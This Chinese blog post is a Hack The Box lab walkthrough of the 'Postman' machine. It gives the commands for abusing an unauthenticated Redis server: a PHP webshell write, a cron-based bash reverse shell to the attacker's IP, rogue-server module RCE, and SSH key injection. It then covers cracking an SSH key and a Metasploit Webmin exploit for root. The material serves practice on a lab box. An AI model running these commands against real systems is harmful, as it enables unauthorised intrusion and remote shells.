Hackthebox---Postman

最新推荐文章于 2024-03-14 16:00:57 发布
最新推荐文章于 2024-03-14 16:00:57 发布
阅读量876 收藏 1
点赞数
分类专栏: 学习笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37027540/article/details/103007377
版权

Hackthebox靶机—Postman

  1. 获取内网ip

  2. 对靶机进行信息探测在这里插入图片描述

  3. 发现存在四个端口开放(22,80,6379,10000),80端口和10000端口都是http服务,打开浏览器查看内容。

  4. 10000端口上起的服务是wenmin,使用searchspolit搜索存在漏洞,打开msfconsole,找到该模块,发现参数中需要账号密码,在浏览器上尝试一些弱密码都失败了,这里可能不是我们的突破口在这里插入图片描述

  5. 使用dirb、nikto或者gobuster对80端口目录进行探测,存在一些upload文件夹等,但是都无法利用,这里还有一个服务可以利用!

  6. redis服务,在网上存在有大量没有安全配置的redis使用了root权限,无密码或者弱密码。这些redis连接在公网上就很容易泄露机密信息,存在很高被黑的风险,基于这种redis服务存在四种利用方式(想要远程连接redis需要现在本地下载安装redis)

  7. 第一种方法:利用方式上传wellshell,需要的权限不高但是需要能够访问到/var/www/html目录,但是这个靶机上的redis权限不够会报错,所以这个方式无法利用
    在这里插入图片描述

    redis-cli -h host -p port -a password  #-h 服务器地址 -p 端口号 -a 密码
set 1 '<?php phpinfo();?>'
CONFIG set dir '/var/www/html' #保存在web目录下
CONFIG set dbfilename a.php	#文件名为a.php
save

  8. 第二种方法:利用定时任务反弹shell。需要开启nc监听4444端口,由于权限太低失败。

    redis-cli -h host -p port -a password  #-h 服务器地址 -p 端口号 -a 密码
set 1 "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/本地ip地址/4444 0>&1\n\n"
CONFIG set dir '/var/www/html' #保存在web目录下
CONFIG set dbfilename a.php	#文件名为a.php
save

  9. 第三种方式:利用Redis基于主从复制的 RCE 利用方式,具体内参考https://blog.csdn.net/systemino/article/details/95913371,下载需要的两个代码模块https://github.com/LoRexxar/redis-rogue-serverhttps://github.com/n0b0dyCN/RedisModules-ExecuteCommand。在RedisModules-ExecuteCommand-master中使用make命令会自动编译生成一个module.so文件,当我在本地以./redis-server --loadmodule ./module.so启动时就可以直接执行系统命令了在这里插入图片描述接下去使用redis-rogue-server.py直接执行脚本,可能会报错把需要的python包下载一下就可以解决python3 redis-rogue-server.py --rhost <target address> --rport <target port> --lhost <vps address> --lport <vps port> 。但是在这个靶机上也执行失败了,好像msf上是有这个模块的,可以直接去尝试一下

  10. 最后就是利用"公钥私钥"获取权限,网上的教程都是将生成的authorized_keys写到/root/.ssh下,肯定是没有权限的,突破口就在这里在论坛上的老哥们的帮助下我知道了redis用户也可以进行ssh登录并且ssh的主目录就是在redis使用config get dir获取到的目录/var/lib/redis下且存在一个/.ssh目录,将文件保存在这个文件下就可以使用Redis用户进行ssh登录了。这里提供一个直接可以利用的脚本,执行时加上redis和ip地址 https://github.com/Avinash-acid/Redis-Server-Exploit/blob/master/redis.py

    ssh-keygen -t rsa #生成公私钥
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt #在公钥前加上\n
cat 1.txt | redis-cli -h 10.10.10.160  -x  set  cracklist
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
10.10.10.160:6379> config set dbfilename authorized_keys
10.10.10.160:6379> save  
ssh -i id_rsa redis@10.10.10.160

  11. 获得redis的shell之后,可以发现home目录下存在一个用户文件夹/Matt,里面有一个user.txt但是没有权限可以查看。在opt目录下有一个id_rsa.bak文件查看里面的内容可以下载到本机上使用ssh2john将该文件转换为john可以执行的文件具体查看我的文章靶机攻击(1),里面有具体操作过程,可以获取到一个密码computer2008

  12. 想到用ssh登录用户是Matt但是只要是使用了加密的id_rsa登录还是直接用密码都会立马断开连接,这时候想到10000端口上,尝试登录成功!

  13. 使用msfcosole上的exploit/linux/http/webmin_packageup_rce模块,将参数填写上去直接run,就可以获得root权限了,记得ssl需要改成true!

lzbzzzzz
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
hackthebox - postman (考点:redis安全 & ssh2john & webmin安全)
冬萍子癸水
05-21 590
1 扫描 22想到可能会有ssh登录, 80进web搜集信息,包括用dirbuster扫目录,但是没找到什么有价值的。 10000是webmin是远程管理系统。也没账号密码。 6379是redis服务,网上也有很多科普这里。 理论上这应该是个在受信任内部环境运行的数据库工具,不应对外开放,既然对外了,可能这就是个利用突破口,可能连密码认证都没要。可以安装用这个工具利用apt install redis-tools Scanning 1 hosts [131070 ports/host] Discovered
hack the boxpostman靶机
zr1213159840的博客
05-08 1582
还是正常打开靶机,然后使用nmap扫描。看看有什么端口是打开的。扫描结果显示,开启了22,80,6379,10000端口。其中6379端口和10000端口值得注意。 nmap -sV -Pn 10.10.10.160 (这有个非常奇怪的地方,我第一次做的时候namp以及masscan无论如何都扫描不出6379端口,但是直接访问又是可以,感觉很郁闷,直接在第一步卡住了。菜……) 我们分别打开80,10000端口看看。其中80端口就是一个简单的页面。 10000端口打开,是webmin,注意这个地方要采用
hackbox
5L2g556F5ZWl77yf
05-15 1338
Archetype 得到一个SSIS(SQL Server Integration Services )配置文件,和账户密码 百度前辈解题步骤,SQLServer 身份验证方式为 操作系统身份验证 https://docs.microsoft.com/en-us/sql/integration-services/lesson-1-4-adding-package-configurations?view=sql-server-2017 通msf连接 开启xp_cmdshell exec sp_confi
【Hack The Box】linux练习-- Postman
人间体佐菲的博客
11-22 441
【Hack The Box】linux练习-- Postman
连接hack the box教程
zr1213159840的博客
03-14 1万+
毕业论文终于告一段落了,虽然不是终版,但是终于能有点时间回来接着学点东西了,今天来连接hack the box靶场。 首先打开hack the box网址,然后注册,登录进去,开启靶场的话需要连接到hack the box。看右上角。 点击右上角,能看到有三种连接方式 我是使用kali进行连接的,所以点击第一个Machines 有两个选项,点击第一个openvpn,这个kali是自带这个功能的,我们点进去后,vpnaccess以及vpnserver都选择好,点击download vpn 然后会下载一
Postman-osx-6.0.10
03-26
这款工具最初是作为Chrome浏览器的一个扩展开始的,随着时间的发展,已经发展为跨平台的应用程序,包括针对macOS的版本,即"Postman-osx-6.0.10"。 1. **Postman简介** Postman简化了API的生命周期管理,包括设计...
Postman-win64-7.2.2-Setup
最新发布
03-19
标题“Postman-win64-7.2.2-Setup”指的是Postman的64位Windows版本的安装程序,版本号为7.2.2。Postman是一款强大的API开发、测试和文档化工具,深受开发者喜爱。这个安装包是专为在Windows操作系统上运行而设计的...
Postman-Interceptor-V1.1.2.zip
11-30
这个"Postman-Interceptor-V1.1.2.zip"文件就是Interceptor的安装包,版本为1.1.2,适用于Chrome浏览器。 Interceptor的主要功能包括: 1. **实时同步**: 当在Chrome浏览器中进行网页操作时,Interceptor可以捕获...
Postman-win64-Setup
10-11
Postman simplifies each step of the API lifecycle and streamlines collaboration so you can create better APIs—faster. API repository Easily store, catalog, and collaborate around all your API ...
Postman-win64 安装包
12-07
Postman-win64 安装包
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 4114
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1985
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3369
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
2201_75353421的博客
01-30 1795
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
HackTheBox访问延迟高-个人解决记录
weixin_42322450的博客
03-14 423
hackthebox延迟高个人解决记录
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
解决hack the box国内访问慢的问题
zr1213159840的博客
05-02 5563
今晚打开靶机使用nmap扫描,实在太慢了,而且靶机的ping一直高居不下,以前可能会选择切换节点试试,但是一般切了后,还是会出现这种情况,主要是国内的网络环境有点“复杂”。 接着 然后 注意: hack the box官网有相应的建议,但是我切换了,不好使,建议如下: ...
Postman(HackTheBox)
test1988x的博客
01-10 810
本文参考:https://mp.weixin.qq.com/s/oMaEx6JDFC7hW5KfhVEGpw 只为记录 redis未授权 ssh-keygen -t rsa -C "redis@fuck" cd .ssh/ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt redis-cli -h 10.10.10.160 ...
HackTheBox 连接加速方案
weixin_41564828的博客
02-02 1329
hackthebox加速
postman-to-openapi
08-26
postman-to-openapi是一个用于将Postman集合转换为OpenAPI规范的工具。你可以使用npm或yarn安装它。通过使用该工具,你可以将Postman集合中的请求、路径、参数等信息转换为OpenAPI规范中的路径、操作、参数等组件。具体使用方法可以参考引用中的代码示例。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [postman-to-openapi::flying_saucer:将邮递员收藏转换为OpenAPI](https://download.csdn.net/download/weixin_42169971/18184351)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [postman-openapi-sync:Postman OpenAPI同步可确保您的本地OpenAPI规范与Postman同步](https://download.csdn.net/download/weixin_42150745/18532039)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [openapi-to-postman:用于将OpenAPI 3.0规范转换为Postman Collection(v2)格式的插件](https://download.csdn.net/download/weixin_42131601/18210633)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值